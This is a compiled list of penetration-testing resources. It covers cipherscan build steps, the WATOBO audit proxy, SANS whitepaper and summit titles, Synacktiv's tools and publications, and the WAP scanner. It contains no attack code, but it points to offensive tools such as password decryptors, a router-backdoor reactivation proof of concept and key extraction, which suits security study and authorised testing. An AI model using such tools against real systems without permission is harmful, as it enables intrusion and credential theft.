• 0 (ok) if it matches. cipherscan can take more than 10 seconds to complete. To alleviate any timeout issues, you may want to run it outside of nagios, passing data through some temporary file.

OpenSSL

Cipherscan uses a custom release of openssl for linux 64 bits and darwin 64 bits. OpenSSL is build from a custom branch maintained by Peter Mosmans that includes a number of patches not merged upstream. It can be found here: https://github.com/PeterMosmans/openssl

You can build it yourself using following commands:

git clone https://github.com/PeterMosmans/openssl.git --depth 1 -b 1.0.2-chacha
cd openssl
./Configure zlib no-shared experimental-jpake enable-md2 enable-rc5 \
enable-rfc3779 enable-gost enable-static-engine linux-x86_64
make depend
make
make report

The statically linked binary will be apps/openssl.

More information can be found on: https://github.com/jvehent/cipherscan

WATOBO – the unofficial manual

WATOBO is intended to enable security professionals to perform highly efficient (semi-automated) web application security audits. I am convinced that the semi-automated approach is the best way to perform an accurate audit and to identify most of the vulnerabilities.

WATOBO has no attack capabilities and is provided for legal vulnerability audit purposes only. It works like a local proxy, similar to Webscarab, Paros or BurpSuite

Additionally, WATOBO supports passive and active checks. Passive checks are more like filter functions. They are used to collect useful information, e.g. email or IP addresses. Passive checks will be performed during normal browsing activities. No additional requests are sent to the (web) application.

Active checks instead will produce a high number of requests (depending on the check module) because they do the automatic part of vulnerability identification, e.g. during a scan.

The functions of WATOBO:

• Supports session management.
• Detects logout and automatically takes a re-login.
• Supports filter functions
• Inline-Encoder/Decoder
• Includes vulnerability scanner
• Quick-scan for targeted scanning a URL
• Full-scan to scan a whole session
• Manual request editor with special functions
• Session information is updated
• Login can be done automatically
• Transcoder
• URL, Base64, MD5, SHA-1
• Interceptor
• Fuzzer
• Free, Stable and Open source!
• Script code easy to understand
• Easy to extend / adapt
• In real-world scenarios tested and developed
• Speed / usability
• Active and Passive checks
• Runs under Windows, Linux, BackTrack, MacOS

All these great features and functions make WATOBO one of the top free web assessment tools.

The program can be downloaded from: http://sourceforge.net/projects/watobo/

Pen Testing Resources: Whitepapers

White Papers are an excellent source for information gathering, problem-solving and learning. Below is a list of White Papers written by penetration testing practitioners seeking certification. SANS attempts to ensure the accuracy of information, but papers are published “as is”.

Errors or inconsistencies may exist or may be introduced over time. If you suspect a serious error, please contact webmaster@sans.org.

Featured Papers

This featured paper includes some really useful techniques that penetration testers should master. Read it, learn it, and live it, as you extend your skills.

• Using Windows Script Host and COM to Hack Windows

Paper	Author	Certification
Practical El Jefe	Vedaa, Charles	GCIH
Correctly Implementing Forward Secrecy	Schum, Chris	GCIH
Powercat	Douglas, Mick	GPEN
Detecting Crypto Currency Mining in Corporate Environments	D’Herdt, Jan	GCIH
Penetration Testing: Alternative to Password Cracking	Catanoi, Maxim	GPEN
Automated Defense – Using Threat Intelligence to Augment	Poputa-Clean, Paul	GCIH
Cyber Breach Coaching	Hoehl, Michael	GCIH
AIX for penetration testers	Panczel, Zoltan	GPEN
Let’s face it, you are probably compromised. What next?	Thyer, Jonathan	GPEN
Secure Design with Exploit Infusion	Wen Chinn, Yew	GCIH
An Analysis of Meterpreter during Post-Exploitation	Wadner, Kiel	GCIH
Creating a Threat Profile for Your Organization	Irwin, Stephen	GCIH
Modeling Security Investments With Monte Carlo Simulations	Lyon, Dan	GWAPT
A Qradar Log Source Extension Walkthrough	Stanton, Michael	GCIH
Differences between HTML5 or AJAX web applications	Thomassin, Sven	GWAPT
Small devices needs a large Firewall	Mastad, Paul	GCIH
Are there novel ways to mitigate credential theft attacks in Windows?	Foster, James	GCIH
Digital Certificate Revocation	Vandeven, Sally	GCIH
Incident Response in a Microsoft SQL Server Environment	Walker, Juan	GCIH
Web Application Penetration Testing for PCI	Hoehl, Michael	GWAPT
Securing Aviation Avionics	Panet-Raymond, Marc	GCIH
iPwn Apps: Pentesting iOS Applications	Kliarsky, Adam	GPEN
Incident Handling Annual Testing and Training	Holland, Kurtis	GCIH
Rapid Triage: Automated System Intrusion Discovery with Python	Bond, Trenton	GCIH
Using Open Source Reconnaissance Tools for Business Partner Vulnerability Assessment	Young, Sue	GCIH
An Approach to Detect Malware Call-Home Activities	Cui, Tianqiang	GCIH
Active Security Or: How I learned to stop worrying and use IPS with Incident handling	Brown, Douglas	GCIH
War Pi	Christie, Scott	GCIH
Getting Started with the Internet Storm Center Webhoneypot	Pokladnik, Mason	GWAPT
Getting Started with the Internet Storm Center Webhoneypot	Pokladnik, Mason	GWAPT
Home Field Advantage: Employing Active Detection Techniques	Jackson, Benjamin	GCIH
Introduction to the OWASP Mutillidae II Web Pen-Test Training Environment	Druin, Jeremy	GWAPT
Talking Out Both Sides of Your Mouth: Streamlining Communication via Metaphor	More, Josh	GCIH
SMS, iMessage and FaceTime security	Khalil, George	GCIH
Using DomainKeys Identified Mail (DKIM) to Protect your Email Reputation	Murphy, Christopher	GCIH
Detecting Security Incidents Using Windows Workstation Event Logs	Anthony, Russell	GCIH
Web Application Injection Vulnerabilities: A Web App’s Security Nemesis?	Couture, Erik	GWAPT
Event Monitoring and Incident Response	Boyle, Ryan	GCIH
Website Security for Mobile	Ho, Alan	GWAPT
Web Log Analysis and Defense with Mod_Rewrite	Wanner, Rick	GCIH
How to identify malicious HTTP Requests	Sarokaari, Niklas	GWAPT
Exploiting Embedded Devices	Jones, Neil	GPEN
InfiniBand Fabric and Userland Attacks	Warren, Aron	GCIH
Incident Handling in the Healthcare Cloud: Liquid Data and the Need for Adaptive Patient Consent Management	Filkins, Barbara	GCIH
PDF Obfuscation – A Primer	Robertson, Chad	GPEN
Attributes of Malicious Files	Yonts, Joel	GCIH
Exploiting Financial Information Exchange (FIX) Protocol?	DeMarco, Darren	GCIH
Covert Channels Over Social Networks	Selvi, Jose	GCIH
Robots.txt	Lehman, Jim	GWAPT
Penetration Testing Of A Web Application Using Dangerous HTTP Methods	Kim, Issac	GWAPT
Shedding Light on Security Incidents Using Network Flows	Gennuso, Kevin	GCIH
In-house Penetration Testing for PCI DSS	Koster, Jeremy	GPEN
Remote Access Point/IDS	Kee, Jared	GCIH
Post Exploitation using Metasploit pivot & port forward	Dodd, David	GPEN
Quick and Effective Windows System Baselining and Comparative Analysis for Troubleshooting and Incident Response	Fuller, Kevin	GCIH
iPhone Backup Files. A Penetration Tester’s Treasure	Manners, Darren	GPEN
Mitigating Browser Based Exploits through Behavior Based Defenses and Hardware Virtualization	Faust, Joseph	GCIH
Securely deploying Android devices	Alonso-Parrizas, Angel	GCIH
Responding to Zero Day Threats	Kliarsky, Adam	GCIH
Practical OSSEC	Robertson, Chad	GCIH
Creating Your Own SIEM and Incident Response Toolkit Using Open Source Tools	Sweeny, Jonny	GCIH
An Overview Of The Casper RFI Bot	O’Connor, Dan	GCIH
Pass-the-hash attacks: Tools and Mitigation	Ewaida, Bashar	GCIH
Solution Architecture for Cyber Deterrence	Mowbray, Thomas	GPEN
Malicious Android Applications: Risks and Exploitation	Boutet, Joany	GPEN
Security Incident Handling in High Availability Environments	Kibirkstis, Algis	GCIH
Using Windows Script Host and COM to Hack Windows	Ginos, Alexander	GPEN
Effective Use Case Modeling for Security Information & Event Management	Frye, Daniel	GCIH
Penetration Testing in the Financial Services Industry	Olson, Christopher	GPEN
Which Disney© Princess are YOU?	Brower, Joshua	GCIH
Why Crack When You Can Pass the Hash?	Hummel, Christopher	GCIH
One Admin’s Documentation is their Hacker’s Pentest	Vandenbrink, Robert	GPEN
IOSTrojan: Who really owns your router?	Santander Pelaez, Manuel Humberto	GCIH
Visualizing the Hosting Patterns of Modern Cybercriminals	Hunt, Drew	GCIH
PCI DSS and Incident Handling: What is required before, during and after an incident	Moldes, Christian	GCIH
A Fuzzing Approach to Credentials Discovery using Burp Intruder	Dawson, Karl	GPEN
Incident Handlers Guide to SQL Injection Worms	Folkerts, Justin	GCIH
IOScat – a Port of Netcat’s TCP functions to Cisco IOS	Vandenbrink, Robert	GCIH
Bypassing Malware Defenses	Christiansen, Morton	GPEN
Investigative Tree Models	Caudle, Rodney	GCIH
A Guide to Encrypted Storage Incident Handling	Shanks, Wylie	GCIH
The SirEG Toolkit	Begin, Francois	GCIH
Incident Handling as a Service	Lundell, Michel	GCIH
Zombie profiling with SMTP greylisting	Koster, Jeremy	GCIH
Using OSSEC with NETinVM	Allen, Jon Mark	GCIH
Detecting Hydan: Statistical Methods For Classifying The Use Of Hydan Based Stegonagraphy In Executable Files	Wright, Craig	GCIH
Document Metadata, the Silent Killer…	Pesce, Larry	GCIH
Espionage – Utilizing Web 2.0, SSH Tunneling and a Trusted Insider	Abdel-Aziz, Ahmed	GCIH
Following Incidents into the Cloud	Reed, Jeffrey	GCIH
Covering the Tracks on Mac OS X Leopard	Scott, Charles	GCIH
Winquisitor: Windows Information Gathering Tool	Cardosa, Michael	GCIH
An approach to the ultimate in-depth security event management framework	Pachis, Nicolas	GCIH
Exploitation Kits Revealed – Mpack	Martin, Andrew	GCIH
Scareware Traversing the World via a Web App Exploit	Hillick, Mark	GCIH
Mining for Malware – There’s Gold in Them Thar Proxy Logs!	Griffin, Joe	GCIH
Detecting and Preventing Unauthorized Outbound Traffic	Wippich, Brian	GCIH
Virtual Rapid Response Systems	Mohan, Chris	GCIH
An Incident Handling Process for Small and Medium Businesses	Pokladnik, Mason	GCIH
Stack Based Overflows: Detect & Exploit	Christiansen, Morton	GCIH
Application Whitelisting: Panacea or Propaganda	Beechey, Jim	GCIH
Multi-Tool DVD Sets: An important addition to the Incident Handler/ Pen Tester’s toolkit	Bandukwala, Jamal	GCIH
Expanding Response: Deeper Analysis for Incident Handlers	McRee, Russ	GCIH
Pros and Cons of using Linux and Windows Live CDs in Incident Handling and Forensics	Smith, Ricky	GCIH
Inside-Out Vulnerabilities, Reverse Shells	Hammer, Richard	GCIH
DNS Sinkhole	Bruneau, Guy	GCIH
The December Storm of WMF: Preparation, Identification, and Containment of Exploits	Voorhees, James	GCIH
Cisco Security Agent and Incident Handling	Farnham, Greg	GCIH
A Practical Application of SIM/SEM/SIEM Automating Threat Identification	Swift, David	GCIH
Effectiveness of Antivirus in Detecting Metasploit Payloads	Baggett, Mark	GCIH
Network Covert Channels: Subversive Secrecy	Sbrusch, Raymond	GCIH
Utilizing “AutoRuns” To Catch Malware	McMillan, Jim	GCIH
Exploiting BlackICE When a Security Product has a Security Flaw	Gara-Tarnoczi, Peter	GCIH
Remote installation of VMware GSX and a virtual machine	Condon, Ed	GCIH
Valentine’s Surprise Firedragging in Action	de Nie, Paula	GCIH
Microsoft Windows Cursor and Icon Format Handling Vulnerability	Perkins, Matthew	GCIH
IBM AIX invscout Local Command Execution Vulnerability –HONORS	Horwath, Jim	GCIH
An Analysis of the Remote Code Execution Vulnerability as Described in Microsoft’s MS05-002 Security Bulletin	Rose, Jerome	GCIH
Identity Theft Made Easy	Huber, Eric	GCIH
0day targeted malware attack	Villatte, Nicolas	GCIH
Exploiting Microsoft Internet Explorer Cursor and Icon File Handling Vulnerability	Chen, Jerry	GCIH
Windows Internet Naming Service – An Exploit Waiting to Happen	Berger, Jeremy	GCIH
Incident Handler Case File: A New Twist to Social Engineering	Hawkins, Ray	GCIH
Exploiting Samba Buffer Overflow Vulnerability via MetaSploit Framework	Ko, James	GCIH
Local Privilege Escalation in Solaris 8 and Solaris 9 via Buffer Overflow in passwd(1)	McAdams, Shaun	GCIH
A Case Study in Solaris Sadmind Exploitation	Nathoo, Karim	GCIH
What is Santy bringing you this year? HONORS	Danhieux, Pieter	GCIH
rLogin Buffer Overflow Vulnerability – Solaris	Corredor, Juan	GCIH
Fun with Batch Files: The Muma Worm	Mackey, David	GCIH
A Picture is Worth 500 Malicious Dwords	Hall, Timothy	GCIH
Remote Exploitation of Icecast 2.0.1 Server	Pittner, Jakub	GCIH
Freezing Icecast in its Tracks	McLaren, Jared	GCIH
Microsoft Internet Explorer SP2 Fully Automated Remote Compromise	Davies, Alan	GCIH
Exploiting Internet Explorer via IFRAME	Becher, Jim	GCIH
Exploiting PHP code injection: phpMyAdmin Multiple Input Validation Vulnerabilities	Kah, Fabrice	GCIH
Ramen Worm	Ives, Millie	GCIH
Sub Seven: A Risk to Your Internet Security	Ostrowski, Paul	GCIH
Network Printers: Whose friend are they?	Hutcheson, Lorna	GCIH
WebDAV Buffer Overflow Vulnerability	Beckley, Peter	GCIH
Open Shares Vulnerability	Hill, Siegfried	GCIH
Simple Network Management Protocol: Now More than a “Default” Vulnerability	Fluharty, Daniel	GCIH
The Microsoft IIS 5.0 Internet Printing ISAPI Extension Buffer Overflow	Clemenson, Christopher	GCIH
The enemy within: Handling the Insider Threat posed by Shatter Attacks	Layton, Meg	GCIH
IP Masquerading Vulnerability for Linux 2.2.x – CVE-2000-0289	Baccam, Tanya	GCIH
IIS 5 In-Process Table Privilege Escalation Vulnerability	Fatnani, Kishin	GCIH
Hijacked Server Serves Up Foreign Bootlegged Pornography	Meyer, Russell	GCIH
Multithreaded, Dictionary-Based, Brute Force Password Attack on Linksys BEFSR41 With Remote Management Enabled Using A Modified THC-Hydra Tool	Kirch, Joel	GCIH
The fascinating tale of a lame hacker, a Linux Box, and how I received permission to deploy my IDS	Markham, George	GCIH
Sun snmpXdmi Overflow	Miller, Kevin	GCIH
0x333hate.c: Samba Remote Root Exploit	Embrich, Mark	GCIH
Stay Alert While Browsing the Internet	LaValley, Jim	GCIH
Robbing the Bank with ITS/MHTML Protocol Handler	Balcik, James	GCIH
Exploit Analysis	Jenkinson, John	GCIH
FTP Port 21 “Friend or Foe” Support for the Cyber Defense Initiative	Karrick, Stephen	GCIH
Port 1433	Georgas, Mark	GCIH
eMule Exploit	Renna, Scott	GCIH
Reverse Engineering Srvcp.exe	Zeltser, Lenny	GCIH
Widespread SNMP Vulnerabilities	Brooks, Greg	GCIH
A Weak Password And A Windows Rootkit: A Recipe For Trouble	Ives, John	GCIH
Incident Illustration – LoveLetter VBS	Gerber, John	GCIH
Phising Attack in Organizations: Incident Handlers Perspective	Ong, Leonard	GCIH
Revisiting the Code Red Worm	White, Ravila	GCIH
Linux NTPD Buffer Overflow	Stadler, Philipp	GCIH
The Blind Leading The Blind – Sadmind/IIS Worm	Barger, Richard	GCIH
Donald Dick 1.55 with Last Updated GUI Component from Version 1.53	Maglich, Ryan	GCIH
BruteSSH2 – 21st Century War Dialer	Thompson, Bill	GCIH
Exploiting Vulnerabilities in Squirrelmail	Bong, Kevin	GCIH
Port 80 (HTTP) – Apache Web Server Chunk Handling Vulnerability	Oksanen, Scott	GCIH
Breaking Windows 2000 Passwords via LDAP Password Crackers	Hamby, Charles	GCIH
Dsniff and Switched Network Switching	Bowers, Brad	GCIH
Exploiting the LSASS Buffer Overflow	Wohlberg, Jon	GCIH
Code Red and the Unix Impact	Mcguire, David	GCIH
Port 443 and Openssl-too-open	Lee, Chia-Ling	GCIH
Hacker Techniques, Exploits, and Incident Handling	Brooker, Denis	GCIH
Incident Illustration – Corporate Compromise	Hall, Russell	GCIH
phpMyAdmin 2.5.7 – Input Validation Vulnerability	Thurston, Tracy	GCIH
FTP Security and the WU-FTP File Globbing Heap Corruption Vulnerability	Webb, Warwick	GCIH
Port 1433 Vulnerability: Unchecked Buffer in Password Encryption Procedure	Bryner, Jeff	GCIH
Windows Media Services NSIISLOG.DLL Remote Buffer Overflow	Smith, Steve	GCIH
Incident Illustration – Missing Files	White, Scott	GCIH
Importance of a Minor Incident: W32/Goner@MM	Legary, Michael	GCIH
Nimda – Surviving the Hydra	Schmelzel, Paul	GCIH
GIAC Certified Incident Handling Practical	Yachera, Stanley	GCIH
Incident Illustration – Mstream	Gallo, Kenneth	GCIH
Incident Illustration – HTTP Services Vulnerabilities	Modelo Howard, Gaspar	GCIH
Buffer Overflow in /bin/login	Puusaari, Matthew	GCIH
SQL Server Resolution Service Exploit in Action	Hoover, James	GCIH
GIAC GCIH Assignment – Pass	Harrison, Daniel	GCIH
An Attacker On RPC Compromised Remote VPN Host Runs Arbitrary Code on Microsoft Exchange Server 2000	Ho, Wai-Kit	GCIH
The Search for “Kozirog”	Weaver, Greg	GCIH
How to Gain Control of a Windows 2000 Server Using the In-Process Table Privilege Escalation Exploit	Stidham, Jonathan	GCIH
SQL Slammer Worm	Hayden, Chris	GCIH
Welchia Worm vs. Policy Makers Fighting Malware with Policy, not with Fire	Corll, Benjamin	GCIH
Incident Ilustration	Chervenka, Dan	GCIH
Tracking the Back Orifice Trojan on a University Network	Knudsen, Kent	GCIH
First Response: An incident handling team learns a few lessons the hard way	Cragg, David	GCIH
Microsoft RPC-DCOM Buffer Overflow Attack using Dcom.c	Farrington, Dean	GCIH
Automated Execution of Arbitrary Code Using Forged MIME Headers in Microsoft Internet Explorer	Winters, Scott	GCIH
False Alarm…Or Was It? Lessons Learned from a Badly Handled Incident	Graesser Williams, Dana	GCIH
SQL Slammer and Other UDP Port 1434 Threats In support of the Cyber Defense Initiative	Ray, Edward	GCIH
Bad ESMTP Verb Usage Equals Bad Times for Exchange	Smith, Aaron	GCIH
Real Network’s Remote Server Remote Root Exploit	Lastor, Michael	GCIH
Wireless LAN Honeypots to Catch IEEE 802.11 Intrusions	Mitchell, Gordon	GCIH
Netscape Enterprise Server Denial of Service Exploit	Smith, Tony	GCIH
Back-Door’ed by the Slammer	Hally, John	GCIH
Eradicating the Masses & Round 1 with Phatbot?	Fulton, Lora	GCIH
FreeBSD 4.x local root vulnerability — exec() of shared signal handler	Durkee, Ralph	GCIH
Identifying and Handling a PHP Exploit	Edelson, Eve	GCIH
Exploiting Sambas SMBTrans2 Vulnerability	Darrah, Byron	GCIH
Relative Shell Path Vulnerability	Evans, Earl	GCIH
A Heap o’ Trouble: Heap-based flag insertion buffer overflow in CVS	Conrad, Eric	GCIH
Mutated Code	Kopczynski, Tyson	GCIH
Windows Shell Document Viewer shdocvw.dll Feature or Trojan Horse?	Fenwick, Wynn	GCIH
A J0k3r Takes Over	Larrieu, Heather	GCIH
Buffer overflow in BIND 8.2 via NXT records	Talianek, Chris	GCIH
Exploiting the MicrosoftWindows Task Scheduler ..job. Stack Overflow Vulnerability	Wenchel, Kevin	GCIH
Neptune.c the Birth of SYN Flood Attacks	Cardinal, Steven	GCIH
Apache Web Server Chunk Handling Vulnerability: An Exploit In Action	Walker, Martin	GCIH
My First Incident Handling Experience	Kohli, Karmendra	GCIH
ICQ URL Remote Exploitable Buffer Overflow	de Beaupre, Adrien	GCIH
Johnny and the Metasploit – “MICROSOFT LSASS MS04-011 OVERFLOW” ATTACK	Greene, Richard	GCIH
Lotus Notes Penetration	Rademacher, Karl	GCIH
System infiltration through Mercur Mail Server 4.2	Ben Alluch Ben Amar, Jamil	GCIH
Session stealing with WebMin	Murdoch, Don	GCIH
Cisco IOS Type 7 Password Vulnerability	Massey, Lee	GCIH
The Cisco IPv4 Blocked Interface Exploit	Johnson, Cortez	GCIH
Phone Phreaking and Social Engineering	Tuey, Richard	GCIH
SMTP Loop Moderate Denial of Service: InterScan VirusWall NT & Lotus Domino Environment	Roberts, Brian	GCIH
Nachi to the Rescue?	Griffith, Russ	GCIH
Testing Web Applications for Malicious Input Attack Vulnerabilities	Grill, Robert	GCIH
Incident Illustration – Firewall Attack	Reed, Bill	GCIH
Incident Handling Without Guidelines	McKellar, Neil	GCIH
Attack of Slammer worm – A practical case study	Huang, Dongmei	GCIH
Combating the Nachia Worm in Enterprise Environments	Johnson, Brad	GCIH
Anna Kournikova Worm	Ashworth, Robert	GCIH
Exploiting the SSH CRC32 Compensation Attack Detector Vulnerability	Williams, R. Michael	GCIH
Traveling Through the OpenSSL Door	Murphy, Keven	GCIH
Catch the culprit!	Perez, David	GCIH
Illustration of VS.SST@mm Virus Incident	Smith, Kevin	GCIH
In Support of the Cyber Defense Initiative	Kohlenberg, Toby	GCIH
Incident Analysis in a Mid-Sized Company	Garvin, Pete	GCIH
All Your Base Are Belong To Someone Else: An Analysis Of The Windows Messenger Service Buffer Overflow Vulnerability	Hewitt, Peter	GCIH
Incident Illustration	Black, Ronald	GCIH
BackGate Kit: The Joy of “Experts”	DePriest, Paul	GCIH
A Management Guide to Penetration Testing	Shinberg, David	GCIH
Author Intruder Alert: Why Internal Security must not take a back seat.	Hendrick, Jim	GCIH
MS IIS CGI Filename Decode Error Vulnerability	Shenk, Jerry	GCIH
The t0rn Rootkit	Craveiro, Paulo	GCIH
At hacker’s mercy while surfing the web – A cross-zone scripting exploit for Internet Explorer	Leibenzeder, Florian	GCIH
A Buffer Overflow Exploit Against the DameWare Remote Control Software	Strubinger, Ray	GCIH
Discovering a Local SUID Exploit	Pike, Jeff	GCIH
Microsoft IIS Superfluous Decoding Vulnerability	Orkin, Kevin	GCIH
A Security Analysis of the Gnutella Peer-to-Peer Protocol	Cheney, Kirk	GCIH
SMTP – Always a victim of a good time	Lock, James	GCIH
Pass – Questions	Stackhouse, Brent	GCIH
A Two Stage Attack Using One-Way Shellcode	Mathezer, Stephen	GCIH
Once Bitten Twice Sly – Common Exploits Fueled by Common Mishap	Melvin, John	GCIH
KaZaA Media Desktop Virus: W32/kwbot	Will, Rita	GCIH
Real World ARP Spoofing	Siles, Raul	GCIH
BIND 8.2 NXT Remote Buffer Overflow Exploit	Mcmahon, Robert	GCIH
Incident Report for a Rootkit attack on a Fedora workstation	Norman, Bonita	GCIH
M@STER@GENTS: Masters of “SPAM”	Ashland, Joanne	GCIH
Support for the Cyber Defense Initiative	Fresen, Lars	GCIH
Penetration Testing of a Secure Network	Pakala, Sangita	GCIH
Local Exploit: dtprintinfo for Solaris 2.6 and 7	Sipes, Steven	GCIH
PHP-Nuke: From SQL Injection to System Compromise	Paynter, Eric	GCIH
Employees Are Crackers Too	Stapleton, Curt	GCIH
Apache Web Server Chunk Handling Apache-nosejob.c	Sarrazyn, Dieter	GCIH
The Tactical Use of Rainbow Crack to Exploit Windows Authentication in a Hybrid Physical-Electronic Attack	Mahurin, Mike	GCIH
Incident Illustration – SGI Penetration	Roth, Jeffrey	GCIH
DreamFTP – The Nightmare Begins!	Sorensen, Robert Peter	GCIH
WU-FTPD Heap Corruption Vulnerability – HONORS	Allen, Jennifer	GCIH
Solaris in.lpd Remote Command Execution Vulnerability	Seah, Meng Kuang	GCIH
When Script-kiddies become the target, as well as the menace: A variant of the WU-FTPD File Globbing Heap Corruption Vulnerability	Hall, Stephen	GCIH
Deep Throat 3.1 Analysis	Prue, Patrick	GCIH
Exploiting the Microsoft Internet Explorer Malformed IFRAME Vulnerability	Tu, Alan	GCIH
What to do when you break WEP Wireless Security and the LAN	Poer, Geoffrey	GCIH
SMBdie’em All – Kill That Server	Kirby, Craig	GCIH
A Study of the o_wks.c Exploit for MS03-049	Arnoth, Eric	GCIH
Jolt2 or “IP Fragment Re-assembly	Beciragic, Jasmir	GCIH

from: http://pen-testing.sans.org/resources/whitepapers

Pen Test Hackfest Summit 2014 and 2013 Documents / PDFs

Pen Test Hackfest Summit 2014

• Crazy Sexy Hacking – Mark Baggett.pdf
• Hacking in Meatspace – Matt Linton.pdf
• Hacking to Get Caught – Raphael Mudge.pdf
• How To Give the Best Pen Test of Your Life – Ed Skoudis.pdf
• iOS Game Hacking – How I Ruled the Worl^Hd and Built Skills for AWESOME Mobile App Pen Tests – Josh Wright.pdf
• Kicking the Guard Dog of Hades – Attacking Microsoft Kerberos – Tim Medin(1).pdf
• Penetration Testing is Dead – Katie Moussouris.pdf
• Pentesting Web Frameworks – Justin Searle.pdf
• Secret Pen Testing Techniques, Part 2 – David Kennedy.pdf
• The State of the Veil Framework – Will Schroeder and Chris Truncer.pdf
• Use of Malware by Penetration Testers – Wesley McGrew.pdf
• Zip file of all PDFs (updated 20141125)

---

Pen Test HackFest Summit 2013

• Android Application Assessment – Christopher Crowley.pdf
• Anti-virus No Thanks – Mark Baggett.pdf
• Beyond Trust – Retina Network Security Scanner Data Sheet.pdf
• Getting Creative – A Story in Thinking Outside the Box – Dave Kennedy.pdf
• grok – @las of d00m.pdf
• Hacking Net Applications_PenTestSummit – James Jardine.pdf
• How Not to Suck at Penetration Testing – John Strand.pdf
• How To Build a Completely Hackable City – Ed Skoudis.pdf
• Offense in Depth – Raphael Mudge.pdf
• Pentesting with Metasploit 2013 – Josh Abraham.pdf
• Post Exploitation Operations with Cloud Synchronization Services – Jake Williams CSRgroup.pdf
• Zip file of all PDFs (updated 20131122)

SynAcktiv.com Digital Security Tools and Documents

TOOLS

• Cisco ACS Repo Decrypt, decrypt Cisco ACS repository passwords
• des26 SAP ITS Decrypt, decrypt des26 SAP ITS (Internet Transaction Server) passwords
• VanDyke SecureCRT Decrypt, decrypt SSH passwords stored in VanDyke SecureCRT session files
• Ethercomm, PoC to reactivate the TCP/32764 backdoor
• SAP SecStore Decrypt, SAP SecStore decryption
• Dissipe, Sage ERP X3 internal passwords decryption
• InYourFace, JSF ViewState tampering
• jimmix, remote administration tool for JBoss AS using the JMXInvoker
• passe-partout, in memory extraction of RSA/DSA keys
• rdp2tcp, TCP tunneling over RDP
• BlueBerry, BlackBerry Enterprise Server passwords decryption

PUBLICATIONS

2015

• Using reverse engineering skills during a penetration test: practical cases, MISC Magazine, Eloi Vanderbeken
• Using a password cracking tool: John the Ripper, GNU/Linux Magazine, Julien Legras

2014

• G-Jacking AppEngine-based applications, NoSuchCon, Nicolas Collignon
• Advanced password breaking (FR), JSSI Rouen conference, Julien Legras
• NoSuchCon 2014 challenge, Eloi Vanderbeken and Nicolas Collignon
• Bypassing IDS/IPS with the TCP Fast Open option – proof-of-concept, Rump session SSTIC 2014, Nicolas Collignon and Renaud Dubourguais
• G-Jacking AppEngine-based Applications, HITB Amsterdam, Nicolas Collignon and Samir Megueddem
• Writeup for dosfun4u (idc), Defcon CTF quals 2014, Eloi Vanderbeken
• Reverse engineering of the Sercomm feature to reactivate the TCP/32764 backdoor on several routers, Eloi Vanderbeken
• Tools and techniques for Red-Team penetration tests, JSSI OSSIR, Renaud Feil
• Arbitrary code execution to escape the Google App Engine Python sandbox, Nicolas Collignon
• Cross-Site Scripting in the Converse.js XMPP/Jabber client, Renaud Dubourguais
• Discovery and patching of a Remote Code Execution in the WP-Filebase plugin, Samir Megueddem
• Discovery of a backdoor on Linksys routers, Eloi Vanderbeken
• Breaking passwords, BADGE ESIEA, Renaud Feil

2013

• OWASP ESAPI library HMAC validation bypass – proof-of-concept code, Renaud Dubourguais and Renaud Feil
• JSF ViewState upside-down, Renaud Dubourguais and Nicolas Collignon
• Oracle TNS protocol hijacking, SSTIC, Nicolas Collignon
• Pentesting JBoss AS in 2013, MISC n°67 (May/June 2013), Renaud Dubourguais
• CVE-2012-5611: MySQL DBMS memory exploitation, MISC n°67 (May/June 2013), Samir Megueddem
• WAF contest – video, JSSI OSSIR, Renaud Dubourguais and Renaud Feil
• J2EE frameworks security: the birth of Expression Language injections, JSSI Rouen, Renaud Dubourguais

2012

• The DevMode flag in Struts 2, SSTIC, Renaud Dubourguais
• Hacking (and securing) JBoss AS, Security Day, Renaud Dubourguais
• Criterium attack / QR-bit flip – vidéo, SSTIC, Nicolas Collignon
• Solution for the ESET BlackHat US Challenge, Eloi Vanderbeken
• Solving the SSTIC challenge, Eloi Vanderbeken

2011

• Pentests: exposing real world attacks, Security Day, Renaud Dubourguais
• Discovery and patching of SQL injections in the WordPress wp-polls plugin, Renaud Feil
• Publication of RDP protocol vulnerabilities, Nicolas Collignon
• Unpacking tips and tricks, MISC magazine HS 7, Eloi Vanderbeken
• Control-flow flattening and symbolic execution, SSTIC conference, Eloi Vanderbeken
• Generating and using memory dumps, RSSIL conference, Eloi Vanderbeken
• Hackito Ergo Sum Crackme, Hackito Ergo Sum conference, Eloi Vanderbeken

2010

• TCP tunneling over RDP, SSTIC, Nicolas Collignon
• Exploiting and securing JBoss AS, SSTIC, Renaud Dubourguais
• Feedback on enterprise applications security, NetFocus, Nicolas Collignon
• In memory extraction of SSL keys, HSC tips, Nicolas Collignon
• Forensic and Software (Un)obfuscation, ECIW conference, Eloi Vanderbeken

2009

• Webshells: how to have your network wide open, GS-Day, Renaud Dubourguais
• Shell over DTMF, SSTIC, Nicolas Collignon

2008

• VMware and virtualization security, OSSIR, Nicolas Collignon
• Penetration testing Windows systems, Télécom Bretagne, Renaud Feil
• Penetration testing web applications, Télécom ParisTech, Renaud Feil

2007

• Evolution of Cross Site Request Forgery attacks, Journal In Computer Virology, Renaud Feil
• Discovering IPv6 networks, SSTIC, Nicolas Collignon
• Feedback on PHP code audits, Forum PHP, Nicolas Collignon
• Web 2.0: more ergonomic… and less secure?, JSSI OSSIR, Renaud Feil
• Encrypting hostile web content over HTTP, SSTIC, Renaud Feil
• Evolution of CSRF attacks, SSTIC, Renaud Feil
• Keyloggers : from XP to Vista, MISC, Renaud Feil
• Detecting compromised systems, SolutionsLinux, Nicolas Collignon

2006

• IPv6: network security threats, IPv6 Worldwide Summit, Nicolas Collignon
• Bypassing web filtering systems, MISC, Renaud Feil
• Client-side vulnerabilities, SSTIC, Renaud Feil
• Impacts and threats around the IPv6 protocol, OSSIR, Nicolas Collignon

2002

• Playing with Windows /dev/(k)mem, Phrack, Nicolas Collignon

from: http://synacktiv.com/en/resources.html

WAP – Web Application Protection

WAP 2.0 is a source code static analysis and data mining tool to detect and correct input validation vulnerabilities in web applications written in PHP (version 4.0 or higher) and with a low rate of false positives.

WAP detects and corrects the following vulnerabilities:

• SQL Injection (SQLI)
• Cross-site scripting (XSS)
• Remote File Inclusion (RFI)
• Local File Inclusion (LFI)
• Directory Traversal or Path Traversal (DT/PT)
• Source Code Disclosure (SCD)
• OS Command Injection (OSCI)
• PHP Code Injection

